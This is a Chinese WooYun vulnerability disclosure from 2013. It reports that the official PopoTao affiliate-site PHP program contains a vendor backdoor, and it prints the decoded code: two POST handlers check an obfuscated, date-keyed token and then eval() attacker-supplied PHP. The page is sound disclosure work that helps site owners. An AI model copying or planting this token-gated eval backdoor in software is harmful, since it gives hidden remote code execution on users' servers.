WooYun.org

漏洞概要 关注数(19) 关注此漏洞

缺陷编号： WooYun-2013-18571

漏洞标题： 泡泡淘（popotao）淘客程序官方后门

相关厂商： 泡泡淘

漏洞作者： 路人甲

提交时间： 2013-02-10 13:15

公开时间： 2013-02-20 15:09

漏洞类型： 文件上传导致任意代码执行

危害等级： 高

自评Rank： 15

漏洞状态： 未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签： 执行任意代码

0人收藏 收藏

分享漏洞：

漏洞详情

披露状态：

2013-02-10： 积极联系厂商并且等待厂商认领中，细节不对外公开
2013-02-20： 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

泡泡淘是一个蛮不错的淘客建站程序，官方网址：http://www.popotao.com。
本人就是他们的用户之一，用他们的程序的网站是：http://www.xiaosajie.com
由于官方几个月不更新，跟不上淘宝API的更新速度，所以我想自己解决，把官方的6个ZEND加密过的PHP文件破解了。结果发现了极其恶心的事情。

详细说明：

漏洞证明：

if ( isset( $_POST['_tks'] ) && ( $tks = trim( $_POST['_tks'] ) ) )


{


    $_tks = explode( "|", ~base64_decode( strrev( substr( $tks, 3, 5 ). substr( $tks, 8 ) . substr( $tks, 0, 3 ) ) ) );


    if ( trim( $_tks[1] ) == "K_".date( "Y_m_d" ) && ( strpos( $_SERVER['HTTP_HOST'], trim( $_tks[0] ) ) !== FALSE || strpos( $_SERVER['SERVER_NAME'], trim( $_tks[0] ) ) !== FALSE ) )


    {


        eval( $_POST['tao'] );


    }


    exit( );


}

if ( isset( $_POST['_MDFK'] ) && ( $tks = trim( $_POST['_MDFK'] ) ) )


{


    $_tks = explode( "|", ~base64_decode( strrev( substr( $tks, 3, 5 ). substr( $tks, 8 ) . substr( $tks, 0, 3 ) ) ) );


    if ( trim( $_tks[1] ) == "K_".date( "Y_m_d" ) && ( strpos( $_SERVER['HTTP_HOST'], trim( $_tks[0] ) ) !== FALSE || strpos( $_SERVER['SERVER_NAME'], trim( $_tks[0] ) ) !== FALSE ) )


    {


        eval( $_POST['_HkBs'] );


    }


    exit( );


}

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价